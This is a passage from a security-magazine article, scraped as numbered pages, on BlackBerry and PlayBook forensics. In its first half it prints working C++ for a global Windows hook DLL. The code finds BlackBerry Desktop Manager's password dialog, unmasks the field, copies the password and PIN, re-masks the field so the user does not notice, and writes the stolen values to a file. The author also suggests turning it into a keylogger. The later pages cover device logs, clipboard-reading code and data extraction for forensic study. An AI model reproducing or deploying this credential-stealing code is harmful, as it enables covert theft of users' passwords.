  15. 15. Don’t Be Mocked Secure Your System 15 / 108 //ReDraw EditBox //InvalidateRect(pass_hwnd, 0, true); //If action is unsuccessfull set "EMPTY" info if (password.Length() == 0) { password = "EMPTY"; } if (DEV_PIN.Length() == 0) { DEV_PIN = "EMPTY"; } if (ATTEMPT.Length() == 0) { ATTEMPT = "EMPTY"; } //Store in StringList variable our PIN, attemps count and pass in_list->Add(DEV_PIN); in_list->Add(ATTEMPT); in_list->Add(password ); Application->ProcessMessages(); try { in_list->SaveToFile("c:pass.txt"); } catch (Exception *ex) { } } } } Look at figures 8. A malware’s code has caught a password, device pin, attempt counter. To prove password’s correctness I comment "SendMessageW(..,0x25cf,..)" line to represent a password without masking (figure 9). Figure 1.8: Stolen password (v4)- part I
  16. 16. Don’t Be Mocked Secure Your System 16 / 108 Figure 1.9: Stolen password (v4)- part II If we try to use this code in Vista or Seven we get nothing, because it is more correct to set system hook is owner address space via loading a DLL-Cather. However, at this rate you should to know OS version, right? Roughly, we need a so-called Major Version to distinct XP and 7 (see the Listing 4). Listing 4. Get OS version bool xp_seven = false; //indicate XP OS or Seven OS void __fastcall get_os() { vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&vinfo); if (vinfo.dwMajorVersion == 4) { this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ← ; } else if (vinfo.dwMajorVersion == 5) { this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ← XP, or Windows 2000"; xp_seven = false; } else if (vinfo.dwMajorVersion == 6) { this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ← Seven"; xp_seven = true; } ... } Now, let us check with class names and window texts against BlackBerry Desktop Manager (figures 10-13). Most of this repeats previous parts exclude several ideas. How to use system hooks you can find on google.com, so I mark several ideas. SysMsgProc(int code, WPARAM wParam, LPARAM lParam) returns to us parameter (LPARAM) Wnd = ((tagMSG*)lParam)→hwnd where stored out handler for controls. Then we need to catch again a password dialog and retrieve a edit’s handler. After successful comparing both handlers you is able to steal password. Note, in this case (dll) you should redraw a control by invalidate-function (see the Listing 5-6).
  17. 17. Don’t Be Mocked Secure Your System 17 / 108 Figure 1.10: Class name & Window Text of controls (v6) - part I Figure 1.11: Class name & Window Text of controls (v6) - part II
  18. 18. Don’t Be Mocked Secure Your System 18 / 108 Figure 1.12: Class name & Window Text of controls (v6) - part III Figure 1.13: Class name & Window Text of controls (v6) - part IV
  19. 19. Don’t Be Mocked Secure Your System 19 / 108 Listing 5. Main definitions void __fastcall TForm1::FormCreate(TObject *Sender) { if (FileExists("c:pass.txt")) { DeleteFile("c:pass.txt"); } //get os version vinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&vinfo); if (vinfo.dwMajorVersion == 4) { this->Edit5->Text = "Windows NT 4.0, Windows Me, Windows 98, or Windows 95" ← ; } else if (vinfo.dwMajorVersion == 5) { this->Edit5->Text = "Windows Server 2003 R2, Windows Server 2003, Windows ← XP, or Windows 2000"; xp_seven = false; } else if (vinfo.dwMajorVersion == 6) { this->Edit5->Text = "Windows Vista, Windows Server Longhorn or Windows ← Seven"; xp_seven = true; } if (xp_seven) { // Load the DLL file hModule = LoadLibrary("Catcher.dll"); // Get the address of the function RunStopHook = (void *(__stdcall *)(bool, HINSTANCE))GetProcAddress(hModule, ← "_RunStopHook"); //Start Catcher RunStopHook(true, hModule); } else { this->CatchTimer->Enabled = true; } } //--------------------------------------------------------------------------void __fastcall TForm1::FormDestroy(TObject *Sender) { if (normally_closed) { return; } if (xp_seven) { if (RunStopHook != NULL) { RunStopHook(false, hModule); } if (hModule != NULL) {
  20. 20. Don’t Be Mocked Secure Your System 20 / 108 FreeLibrary(hModule); } } } //--------------------------------------------------------------------------void __fastcall TForm1::FormClose(TObject *Sender, TCloseAction &Action) { if (xp_seven) { if (RunStopHook != NULL) { RunStopHook(false, hModule); } if (hModule != NULL) { FreeLibrary(hModule); } } normally_closed = true; } Listing 6. DLL Catcher HHOOK SysHook; HWND Wnd; HINSTANCE hInst; TStringList *in_list = new TStringList(); //--------------------------------------------------------------------------int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved) { hInst = (HINSTANCE)hinst; return 1; } //--------------------------------------------------------------------------extern "C" void __export RunStopHook(bool State, HINSTANCE hInstance) { if (true) { SysHook = SetWindowsHookEx(WH_GETMESSAGE, &SysMsgProc, hInst, 0); } else { //clear our storage is it’s unhooked in_list->Clear(); UnhookWindowsHookEx(SysHook); } } //--------------------------------------------------------------------------LRESULT CALLBACK SysMsgProc(int code, WPARAM wParam, LPARAM lParam) //hook code, removal flag, address of structure with message { //Pass message to other system hooks CallNextHookEx(SysHook, code, wParam, lParam); //Check Message if (code == HC_ACTION) { //Get Window’s Handler that give a message Wnd = ((tagMSG*)lParam)->hwnd; //ClassName of Window char *internal = "#32770";
  21. 21. Don’t Be Mocked Secure Your System 21 / 108 //Caption of Window char *external = "Device Password Required"; //Catch a Window HWND window = FindWindow(internal, external); if ((bool)(int)window) { //Label like "Password:" char *stat_pass_text = (char *)malloc(256); //Label like "PIN of Device:" char *stat_devc_text = (char *)malloc(256); //Label like "Your attempt counts:" char *stat_attmp_text = (char *)malloc(256); //In HWND //In HWND //In HWND Z-order first of all get a password-static control stat_pass = FindWindowEx(window, NULL, "Static", "Password:"); Z-order previous of it is attemp’s count stat_attmp = GetWindow(stat_pass, 3); Z-order next of it is Device PIN stat_devc = GetWindow(stat_pass, 2); //get control’s caption for a password-static control GetWindowText(stat_pass, stat_pass_text, 256); //get control’s caption for a pin-static control GetWindowText(stat_attmp, stat_attmp_text, 256); //get control’s caption for a attemp_count-static control GetWindowText(stat_devc, stat_devc_text, 256); AnsiString DEV_PIN = AnsiString(stat_devc_text); AnsiString ATTEMPT = AnsiString(stat_attmp_text); //correct a program version: //if NULL then BlackBerry Manager v4 or BlackBerry Manager v5 //else everythin ’s OK - BlackBerry Desktop Manager v6 if (DEV_PIN.Length() < 1) { int pos = AnsiPos("n", AnsiString(ATTEMPT.c_str())); //extract a first part of Static (PIN) DEV_PIN = ATTEMPT.SubString(1, pos - 1); //extract a second part of Static (attempt’ count) AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT. ← Length() - pos); } free(stat_devc_text); free(stat_attmp_text); free(stat_pass_text); //get handler of EditBox HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL); //Check desirable EditBox (with Parent Form’s Caption "Device Password Requied") If ( ((bool)(int)pass_hwnd) & (pass_hwnd == Wnd) ) { //unset password masking SendMessage(Wnd, EM_SETPASSWORDCHAR, 0, 0); //ReDraw EditBox InvalidateRect(Wnd, 0, true); //allocate memory for edit’s password char *passw = (char *)malloc(256); //Password’s borrowing ←
  22. 22. Don’t Be Mocked Secure Your System 22 / 108 SendMessage(Wnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw); //store in new variable AnsiString password = AnsiString(passw); free(passw); //Don’t let him (user) see it. Paint out. //0x25CF is unicode character of black circle //(dialog boxes on Win7, XP). SendMessageW(Wnd, EM_SETPASSWORDCHAR, 0x25cf, 0); //ReDraw EditBox InvalidateRect(Wnd, 0, true); //If action is unsuccessfull set "EMPTY" info if (DEV_PIN.Length() == 0) { DEV_PIN = "EMPTY"; } if (ATTEMPT.Length() == 0) { ATTEMPT = "EMPTY"; } if (password.Length() == 0) { password = "EMPTY"; } //Store in StringList variable our PIN, attempts count and pass in_list->Add(DEV_PIN); in_list->Add(ATTEMPT); in_list->Add(password); try { in_list->SaveToFile("c:pass.txt"); } catch (Exception *ex) { } } } } return 0; } Grand Success! Look at figures 14-15. We have just caught a bit more extra-protected password. ←
  23. 23. Don’t Be Mocked Secure Your System 23 / 108 Figure 1.14: Stolen password (v6) - part I Figure 1.15: Stolen password (v6) - part II If we manage not with tray application but main BlackBerry Desktop Software (v6-7) then we are not lucky and need to catch another password dialog built in application as well as backup pass dialog. BlackBerry Manager v4 or v5 is based on C++ (and method is the same like previous), but BlackBerry Desktop Manager is based on C# and .NET according to PE analyzers. Thus, it impossible to use WINAPI for stealing. Nevertheless, there’s solving. We still can catch a window dialog like Unlocking device and Backup device’s data. Look at THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE and figures 16-17 THREE CONSTANTS OF BLACKBERRY DESKTOP SOFTWARE WINDOW TEXT BlackBerry® Desktop Software CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;4f73dd50-23b3-416c-9ae3-81d8908073f1] WINDOW TEXT Unlock BlackBerry® device CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;606b4596-b8eb-4102-8d62-5c87d2220001] WINDOW TEXT Back Up Options CLASSNAME TEXT HwndWrapper[Rim.Desktop.exe;;547a3dd4-57aa-4e40-a2ea-16b19fd1697e]
  24. 24. Don’t Be Mocked Secure Your System 24 / 108 Figure 1.16: BlackBerry Desktop Manager’s Handlers – part I Figure 1.17: BlackBerry Desktop Manager’s Handlers – part II According to DLL-Catcher and system hooks is possible to make a key-logger that waiting two handler then stealing a password and hibernating watcher mechanism. Gathering Logs Previous article on forensics mentioned that BlackBerry Smartphone SDK and BlackBerry Desktop Software have two tools (javaloader, and loader) to provide classic forensic. All PlayBook SDK provided by RIM, e.g. Adobe Air SDK has a tool "blackberry-connect" is just a wrapper for "Connect.jar". But before connect RSA key-pair should be generated by "ssh-keygen -t rsa -b 4096" and "Development Mode" option enabled. Then should be typed target ip (often 169.254.0.1 for USB), device password and ssh key as parameters. This tool extracts device information (like OS, fingerprint, hardware id, vendors id, debug mode tokens, etc.), application list information (like module, version, icon ID, name, vendor, source, etc.) and more. In addition,
  25. 25. Don’t Be Mocked Secure Your System 25 / 108 Wi-Fi logs stored IP, DNS, subnet mask; information about (un-)successful attempts may be analyzed by manual acquisition only. See section "Device Information", "Application List", and pictures (18-21). Application List Info: Sending request: List Info: Action: List @applications IMplus.gYABgI3xb8I_.nuWDj1NQXBLFM0::gYABgI3xb8I_-nuWDj1NQXBLFM0,1.4.0.0,contentID::44726, ← iconID::291534,name::IM+ for BlackBerry PlayBook,sku::IMPlus_for_BlackBerry_PlayBook, ← vendor::SHAPE,id::559225,releaseType::1,version::1.4,size::1221509,source::appworld WeatherEye10856d5e12aafbeab482ffb6197b1513.gYABgIBVxHVXGt5sqs7ysg11.RY:: ← gYABgIBVxHVXGt5sqs7ysg11-RY,1.1.0.0,contentID::40883,iconID::266669,name::WeatherEye HD, ← sku::SKU_WEATHEREYEHD1,vendor::The Weather Network,id::286667,releaseType::1,version ← ::1.1,size::1411489,source::appworld WeatherMap.gYABgKX7io3amtWzWeXo8.d.kSQ::gYABgKX7io3amtWzWeXo8-d-kSQ,1.2.9.350,contentID ← ::33880,iconID::225599,name::Weather Map,sku::WeatherMap,vendor::Christian Ruiz,id ← ::262761,releaseType::1,version::1.2.9,size::1419549,source::appworld com.facebookforplaybook.gYABgGIoTQuGRMYqlV83okVZick::gYABgGIoTQuGRMYqlV83okVZick,2.2.1.7, ← contentID::43106,iconID::280252,name::Facebook for BlackBerry PlayBook,sku:: ← FacebookforPlayBook,vendor::Research In Motion Limited,id::477829,releaseType::1,version ← ::2.2.1.7,size::4382469,source::appworld sys.uri.twitter.gYABgForKB9INNC6dqqT5_aG.wE::gYABgForKB9INNC6dqqT5_aG-wE,2.0.1.15,source:: ← websl,scmbundle::2.0.1.358 sys.videochat.gYABgHXmq9LYQB023b3XQAWry1k::gYABgHXmq9LYQB023b3XQAWry1k,2.0.1.247,source:: ← websl,scmbundle::2.0.1.358 sys.videoplayer.gYABgEydozZr9q.ClZkrItC9LMM::gYABgEydozZr9q-ClZkrItC9LMM,2.0.1.234,source:: ← websl,scmbundle::2.0.1.358 sys.voicerecorder.gYABgCpT2Fra8qyc1S2btWJS_S4::gYABgCpT2Fra8qyc1S2btWJS_S4,2.0.1.233,source ← ::websl,scmbundle::2.0.1.358 sys.weather.gYABgKOf0EhVEWtCxrbBQ00sPSg::gYABgKOf0EhVEWtCxrbBQ00sPSg,2.0.1.234,source:: ← websl,scmbundle::2.0.1.358 sys.youtube.gYABgPcyRJTp899l1vKiJZewK88::gYABgPcyRJTp899l1vKiJZewK88,2.0.1.240,source:: ← websl,scmbundle::2.0.1.358 Device Information Info: Sending request: List Info: Sending request: List Device Info Info: Action: List Device Info [n]@deviceproperties device_os::BlackBerry PlayBook OS drmhwfp:: 0x62xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx fingerprint:: 3pIxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx hardwareid::0x06xxxxxx radiofingerprint::none scmbundle::2.0.1.xxx scmbundle0::2.0.1.xxx scmbundle1::2.0.1.xxx vendorid::0x1f8 [n]@deviceproperties devicepin::0x50xxxxxx deviceserialnumber::00xxxxxxx13xxx95xxxx [n]@devmode [n]debug_token_author::Yury Chemerkin [n]debug_token_expiration::Sat May 12 00:22:58 GMT+0400 2012 [n]debug_token_installed:b:true [n]debug_token_timeout::10d [n]debug_token_valid:b:true [n]debug_token_validation_error:: [n]debug_token_validation_error_code:n:0 [n]dev_mode_enabled:b:true [n]dev_mode_expiration::10d
  26. 26. Don’t Be Mocked Secure Your System 26 / 108 [n]dev_mode_waiting:b:true @versions air_version::3.1.0.38 flash_version::11.1.121.38 build_id:: 186xxx production_device:b:true Figure 1.18: Wi-Fi Status and logs Figure 1.19: Log options
  27. 27. Don’t Be Mocked Secure Your System 27 / 108 Figure 1.20: Wi-Fi Info Figure 1.21: Logs Wi-Fi Logs ******************************** Wi-Fi Diagnostics Logs ********************************
  28. 28. Don’t Be Mocked Secure Your System 28 / 108 ****** DEVICE INFORMATION ****** > Physical Address: e8:xx:xx:xx:xx:xx > Device OS: BlackBerry PlayBook OS > Device Pin: 500xxxxx > OS Version: 2.0.1.668 ****** INTERNET CONNECTION ****** > IP Address: 192.168.1.31 > Subnet Mask: 255.255.255.0 > Default Gateway: 192.168.1.1 > Primary DNS: 192.168.1.1 > Secondary DNS: > Domain Suffix: > MTU: 1500 > Proxy Server: > Proxy Port: ****** WI-FI INFORMATION ****** > Status: Connected > Failure Reason: > Profile Name: XXXX > SSID: XXXX > Channel: 11 > AP MAC Address: 48:xx:xx:xx:xx:xx > Security Type: WPA2 Personal > EAP Method: > Signal Level: -41 dBm > Connection Data Rate: 65 Mbps > Network Type: 802.11g/n ******************************** Supplicant Logs ******************************** > 21:27:40: 1v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] > 21:27:40: 2v WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] > 21:27:39: 3v Associated with 48:xx:xx:xx:xx:xx > 21:27:39: 4v Trying to associate with 48:xx: xx:1 xx 3:c9:4d (SSID=XXX freq=2462 MHz) > 21:27:19: 5v CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys > 00:10:34: 6v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] > 00:10:34: 7v > 00:10:34: 8v Associated with 48:xx:xx:xx:xx:xx > 20:41:30: 9v CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (reauth) [ id=0 id_str=] v > 20:41:30: 10 WPA: Key negotiation completed with 48:xx:xx:xx:xx:xx [PTK=CCMP GTK=CCMP] 11 Associated with 48:xx:xx:xx:xx:xx > 20:41:30: v v > 20:41:30: 12 Trying to associate with 48:xx:xx:xx:xx:xx (SSID=’XXXX’ freq=2462 MHz) v > 20:26:03: 13 CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys v > 17:49:29: 14 CTRL-EVENT-CONNECTED - Connection to 48:xx:xx:xx:xx:xx completed (auth) [id =0 id_str=] ← ← ← ←
  29. 29. Don’t Be Mocked Secure Your System 29 / 108 Backup Data Managing with backup starts with BlackBerry Desktop Manager that results ".IPD" (early, now it is ".BBB" file is just compress with tar) in a destination folder. This file stores: • on BlackBerry smartphone very granulated data (incl. Options) like Address Book, Alarm, Attachment, AutoText, BlackBerry Bridge, BlackBerry Wallet, Bluetooth, Browser, Calendar, Camera, Certificate, etc. • on BlackBerry tablet only Application Data, Media and Settings. As PlayBook does not provide native Password Wallet, many third party applications often save data in shareddocuments folder in ".db" format easy analyzed if no encryption. BlackBerry Simulation The BlackBerry Smartphone Simulator built for simulating a backup copy of the physical device. This is helpful if the device is low on battery, should be placed to the "turn off" state, or you do not want to alter the data on the physical device. Following steps are suitable for each BlackBerry device model. Nevertheless, there is no similar solution for the PlayBook as well as for Android, despite of that is very useful and valuable. Live (Spy) forensic There some situations that is not desirable to shut down, seize the digital device, and perform the forensic analysis at the lab. For example, if there is an indication that an encryption mechanism used on the digital device that was discovered, then the investigator should not shutdown this digital device. Otherwise, after shutdown all encrypted information (potential evidence) will be unintelligible. By performing Live Analysis, the investigators attempt to extract the encryption key from the running system. An up-to-date BlackBerry has many data, such as several mobile or home phone number, faxes, emails, work and home addresses, web-pages or dates; IM data and social data, private data such as tracking info, habits, time marked a free, time when user’s possible sleeping, time when user’s at home/company can come to light and many else. However, all those can be extracted only with API or Backup file. Clipboard is breakable too because user have to see a password to retype in another application that can easily be screen-captured or to copy into clipboard that not protected, because user still have to put data (password) into non-protected text-box, sometimes in plaintext even. In other words, end-point object is vulnerable. As Clipboard API exists like getClipboard() on BlackBerry, getData() on PlayBook, or getText() on Android (see the Listing 7). Listing 7. Clipboard events for PlayBook package { import import import import import import import flash.desktop.Clipboard; flash.desktop.ClipboardFormats; flash.desktop.ClipboardTransferMode; flash.display.Sprite; flash.display.StageAlign; flash.display.StageScaleMode; flash.text.TextField; import qnx.events.ClipboardEvent; import qnx.events.QNXSystemEvent; public class Clipboard1 extends Sprite { public function Clipboard1() { super();
  30. 30. Don’t Be Mocked Secure Your System 30 / 108 stage.align = StageAlign.TOP_LEFT; stage.scaleMode = StageScaleMode.NO_SCALE; var tf:TextField = new TextField(); tf.height = 600; tf.width = 1024; tf.text = "result = n" + paste(); this.addChild(tf); } private function write():String { return ClipboardEvent.CLIPBOARD_WRITE; } private function read():String { return ClipboardEvent.CLIPBOARD_READ; } private function copy(text:String):void { Clipboard.generalClipboard.clear(); Clipboard.generalClipboard.setData(ClipboardFormats.TEXT_FORMAT, text); } ← private function paste():String { if(Clipboard.generalClipboard.hasFormat(ClipboardFormats. ← TEXT_FORMAT)) { return String(Clipboard.generalClipboard.getData( ← ClipboardFormats.TEXT_FORMAT)); } else { return null; } } } } Figure 1.22: Clipboard Formats To access to the Pictures, Videos, Voice notes, and other files, some of them may be video captured or audio captured, forensics expert rarely need to intercept API events or break root rights; all needs is listen file events of creating and deleting files or grab
  31. 31. Don’t Be Mocked Secure Your System 31 / 108 these files from internal/external storage. Pictures are more inquisitive as camera-snapshots since it has EXIF-header. Metadata is, quite simply, data about data. Many digital camera manufacturers, such as Canon, Sony and Kodak implement EXIF headers. This header is stored in an "application segment" of a JPEG file, or as privately defined tags in a TIFF file. Not only basic cameras have these headers, but also both mobile devices provide the "Camera Make" as RIM/BlackBerry/Android/HTC data as well as "Camera Model" may often be device model. GPS or date tag often renames filename by placing into beginning city name except Android and PlayBook. They place GPS and date tag in EXIF only. Just remind: photos named IMG20120103xxxx. To talk about geo-tag per file then I will get a "Moskva" prefix in file name. Of course, it is not enough when city names named in the same manner like US states, however, it may differ because I cannot test it. Anyway, it is obvious why developers store name of file as city part, Date part and increment part. Some examples for the PlayBook: camera - Research In Motion, model – BlackBerry Playbook, exposure – 1/xxx s, diaphragm opening – 2.97, flash – no, EXIF version – 0230. Audio notes, photos, videos, music, and camera’s data stored in one place (more correctly in two places, on internal storage and external storage like SD-card if an external exists). Any programmers are allowed to listen these folder path to extract your data in realtime; moreover they may have exactly API to access to the same folders. They may associate their listeners with specified file format like AMR (BlackBerry Smartphone) or m4a (BlackBerry Tablet) that used to store your BlackBerry voice notes. They often store in "voice notes" folder, named as VN-20120319-xxxx.AMR or VN-20120319-xxxx.m4a. "20120319" is date with YYYY-MM-DD formatting. As you can see, you do not need to extract properties to know when it recorded; you do not even need to link (programmatically) folder with type file (logical level) because "VN" is voice note. Recorded video files named "VID-YYYYMMDD-XXXXXX.3GP" as voice note or picture file for BlackBerry Smartphone and VID- XXXXXX.MP4 for tablet. Each application has access to its own working directory in the file system on the PlayBook, and might access to the shared folder (sandbox) because of the access to the files and folders governed by UNIX-style groups and permissions. It means applications cannot create new directories in the working directory; they can only access the folders listed in Table 1. Table 1.1: Table 1. Playbook Shared folders structure Folder app data temp logs shared shared/bookmarks shared/books shared/clipboard shared/documents shared/downloads shared/misc shared/music shared/photos shared/videos shared/voice What data contains The installed application’s files. The application’s private data. The application’s temporary working files. System logs for an application (stderr and stdout) Subfolders that contain shared data grouped by type. Web browser bookmarks that can be shared among applications. eBook files that can be shared among applications. Data copied or cut from another application (txt, html, uri format). Documents that can be shared among applications. Web browser downloads. Miscellaneous data that can be shared among applications. Music files that can be shared among applications. Photos that can be shared among applications. Videos that can be shared among applications. Audio recordings that can be shared among applications. Access type read-only read and write access read and write access read and write access no access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access read and write access
  32. 32. Don’t Be Mocked Secure Your System 32 / 108 Table 1.2: Table 2. Extractable Data Type Address Book Calendar Events Call History Browser history and bookmarks Process Management Memos and Tasks Screen-shots Camera-shots Videocamera-shots Clipboard Location tracking (cell, wifi, gps, bluetooth) SMS/MMS/Emails/IM Saved Messages Pictures, Videos, Voice notes, and other files File and Folder structure IMs Passwords Clipboard BlackBerry OS BlackBerry Smarpthone + + + + + + + + + + + BlackBerry Playbook + + + + + + + + + + + + + + + + + Conclusion Mobile devices are everywhere, and contain more evidence about their users than perhaps any other source. The technology is constantly changing, making forensics a challenge. Handled properly, however, a forensic examination of a mobile device can yield evidence that cannot be found anywhere else, including communications and geographic location data that can change the course of an entire case or investigation. The BlackBerry devices as well as Android devices share the same evidentiary value as any other Personal Digital Assistant (mobile device). As the investigator may suspect of most file systems, a delete is by no means a total removal of data on the device. However, the BlackBerry smartphone is always-on, wireless push technology adds a unique dimension to forensic examination. Android and Playbook instead tends to be more offline and wake up by user actions. All mentioned above highlights value and up-to-date techniques on forensics area, some of them based on issues misunderstanding development concepts or else. Similar to the BlackBerry, Push-technology allows information be pushed through its radio antenna at any time, potentially overwriting previously "deleted" data. Classic Forensics techniques or DLP system is ineffective to stop it because of time, applications that exchanged data in real-time. In addition, the password has a long-term problem. Some techniques very impactful but limited special cases. It’s obvious Android should be rooted, BlackBerry smartphone should have a backup or correspond to the forensics methods and tools, while Playbook limits with shared folder only and there’s no way to root it or mirror all data to the PlayBook simulator as it was for BlackBerry smartphone. The files store on external or internal storage might be useful to obtain some data stored in backup or available to API. It means forensics needs more practical and preventive techniques to extract data. Simply using developer’s API helps to grab data like password for social networks or mail inbox in blackberry smartphone cases that do not stored anywhere. In addition, IM chats do not store else external/internal storage and can only be accessible in way data extracting but if password is known and storage does not encrypted. It means live techniques through API make sense only. Moreover, there is technique preventing successful USB or Bluetooth connection as a live-agent performing DDoS to the event-listener. Finally, all security holes or vendor vision about security on their OS are very astounding to use, it reduces the risks for loss of valuable data and improve existing solutions. In addition, forensics expert protected from almost all objectives capable break and stop forensics investigation.
  33. 33. Don’t Be Mocked Secure Your System 33 / 108 On the Net • To Get Round to the Heart of Fortress. Hakin9 Extra. Yury Chemerkin: http://hakin9.org/to-get-round-to-the-heart-of-fortress/ • Why is password protection a fallacy a point of view, Hakin9 Extra, Yury Chemerkin: http://hakin9.org/hakin9-extra-12011exploiting-software/ • The Philosophy of QNX Neutrino: https://developer.blackberry.com/native/documentation • The QNX Neutrino Microkernel: https://developer.blackberry.com/native/documentation • Dynamic Linking: https://developer.blackberry.com/native/documentation • Process Manager: https://developer.blackberry.com/native/documentation • What is BlackBerry Tablet OS?: https://developer.blackberry.com/native/documentation • Managing your application through the application life cycle: https://developer.blackberry.com/native/documentation • Accessing restricted functionality: https://developer.blackberry.com/native/documentation • Folders accessible by an application: https://developer.blackberry.com/native/documentation • Filesystems: https://developer.blackberry.com/native/documentation • Networking Architecture: https://developer.blackberry.com/native/documentation • TCP/IP Networking: https://developer.blackberry.com/native/documentation • A Playbook for Real-Time, Closed-Loop Control, Harry Funk, Robert Goldman, Christopher Miller, John Meisner, Peggy Wu, Smart Information Flow Technologies, LLC: http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA439281 • When Developer’s API Simplify User-Mode Rootkits Developing, Hakin9 Mobile Magazine: http://hakin9.org/hakin9-mobile22012-2 • When Developers API Simplify User-Mode Rootkits Development - Part II, Hakin9 OnDemand Magazine: http://hakin9.org/hakin9-ondemand-network-security-4124 • "Insecurity of blackberry solutions: Vulnerability on the edge of the technologies," vol. 6, pp. 20-21, December 2011 [Annual InfoSecurity Russia Conf., 2011] • D. M. Gomez, A. Davis, BlackBerry PlayBook Security: Part one. NGS Secure, 2011.: http://www.nccgroup.com/secure/hVq8hE-N4Wc%3d/1099 • BlackBerry PlayBook Security - Part Two - BlackBerry Bridge, G. Jones, NGS Secure, 2011: http://www.nccgroup.com/secure/V20GFyDJrD0%3d/1099 • Mobile Device Forensics: A Brave New World? Contributed by Jason Gonzalez and James Hung, Stroz Friedberg LLC: http://www.strozfriedberg.com/files/Publication/ • Challenges in Mobile Phone Forensics, Kyle D. Lutes, Richard P. Mislan: http://www.iiis.org/cds2008/cd2008sci/citsa2008/paperspdf/i649ok.pdf • Mobile Forensics: an Overview, Tools, Future trends and Challenges from Law Enforcement perspective, Rizwan Ahmed, Rajiv V. Dharaskar: http://www.iceg.net/2008/books/2/34_312-323.pdf
  34. 34. Don’t Be Mocked Secure Your System 34 / 108 About the author Yury Chemerkin Graduated at Russian State University for the Humanities (http://rggu.com/) in 2010. At present postgraduate at RSUH. Information Security Researcher since 2009 and currently works as mobile and social information security researcher in Moscow. Experienced in Reverse Engineering, Software Programming, Cyber & Mobile Security Researching, Documentation, and Security Writing as regular contributing. Now researching Cloud Security and Social Privacy. Contacts I have many social contacts to help you choose the most suitable way for you. Regular blog: http://security-through-obscurity.blogspot.com Regular Email: yury.chemerkin@gmail.com Skype: yury.chemerkin Other my contacts (blogs, IM, social networks) you will find among http links and social icons before TimeLine section on Re.Vu: http://re.vu/yury.chemerkin

×